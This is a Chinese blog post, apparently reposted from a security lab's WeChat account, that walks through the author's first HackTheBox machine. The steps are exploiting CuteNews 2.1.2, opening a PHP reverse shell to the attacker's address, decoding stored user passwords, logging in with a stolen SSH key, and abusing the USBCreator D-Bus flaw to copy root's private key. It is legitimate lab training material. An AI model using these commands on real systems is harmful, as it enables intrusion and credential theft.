hackthebox 我的第一次

  • A+
所属分类:安全文章

本文作者:time(Ms08067内网安全小组成员)

time微信(欢迎骚扰交流):

hackthebox 我的第一次


这是我第一次玩 hackthebox,就找个尽量简单点的,拿到ip先简单扫一扫


hackthebox 我的第一次


那肯定只有80开始点击一看

hackthebox 我的第一次


当时点了一个,就发现这样的链接(本来想跑目录,结果跑不动就没试了)

http://10.10.10.206/index.php?id=8

让我试了几个单引号,跑了下 sqlmap,然后发现并没有,就尴尬,随后就点这个红色的 RSS

http://10.10.10.206/CuteNews/rss.php

随手删了一下 rss.php 看到登录页面

hackthebox 我的第一次


再注册的时候发现Powered by CuteNews 2.1.2 © 2002–2020 CutePHP. ,这玩意儿肯定有漏洞

hackthebox 我的第一次


重点应该是后面两个,上传没看明白咋改变文件名,就想直接尝试第二个, searchsploit CuteNews 2.1.2 -m 48800下载下来发现直接把url放进去就可以,这都可以?

hackthebox 我的第一次


发这个生成的shell,不好用就直接找出我小本本里的php反弹shell命令

php -r '$sock=fsockopen("10.10.14.8",4445);exec("/bin/bash -i <&3 >&3 2>&3");'

就到处找了很久,也试过 linux 内核漏洞,就注意到home目录下有两个用户名但没有权限访问

hackthebox 我的第一次


查看进程发现一下一个引人注目的东西

hackthebox 我的第一次


然后就没了就挺下来想这web应该有些提示密码啥的吧在web目录下找到很久才发现这cdata目录下有东西

hackthebox 我的第一次


看到users.txt,平时看到别人文章在关键位置都发现users.txt,在看users文件发现都是base64的

hackthebox 我的第一次


一个解密看看,发现有出现这两个用户,但是nadav的密码无法在md5网站解密,就paul 解密出来    atlanta1

hackthebox 我的第一次


然后su发现无法成功

hackthebox 我的第一次


搜索一下,哦原来这样就可以了

python -c 'import pty; pty.spawn("/bin/sh")'

hackthebox 我的第一次


然后就去看了paul用户目录下的文件,cat .*/* 直接全部查看

hackthebox 我的第一次


看到有这个 ssh 的私钥

ssh 公私密钥:可以生成免密登录,分为公钥和私钥,私钥才是登录密码


 ssh -i doc [email protected] 

PS:私钥文件必须只能是600,访问权限太高太低都不行,以为这是paul的私钥,没想到试了一下,nadav也可以登录根据找别人文章提示发现

hackthebox 我的第一次


发现USBCreator D-bus有一个接口漏洞,使得攻击者能够访问sudoer组中的用户,从而绕过sudo程序强加的密码安全策略。此漏洞允许攻击者以根用户身份覆盖具有任意内容的任意文件,而无需提供密码。这会导致特权提升,例如,通过覆盖影子文件和为root设置密码。

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/


gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator--method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa(未授权访问位置) /tmp/ssh(文件存放位置) true


hackthebox 我的第一次


利用 root 的私钥,成功登录

hackthebox 我的第一次


总结:web方面进入,细心观察,耐心点,了解了ssh的私钥密钥问题,在拿到地权限,主要收集web站点的信息找突破。信息收集在渗透中尤为重要。




内网小组持续招人,扫描二维码,来一起玩耍!

hackthebox 我的第一次




扫描二维码学习各类安全技术,邀请进入内部微信群!

hackthebox 我的第一次 hackthebox 我的第一次

 hackthebox 我的第一次hackthebox 我的第一次

目前30000+人已关注加入我们

hackthebox 我的第一次

本文始发于微信公众号(Ms08067安全实验室):hackthebox 我的第一次

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: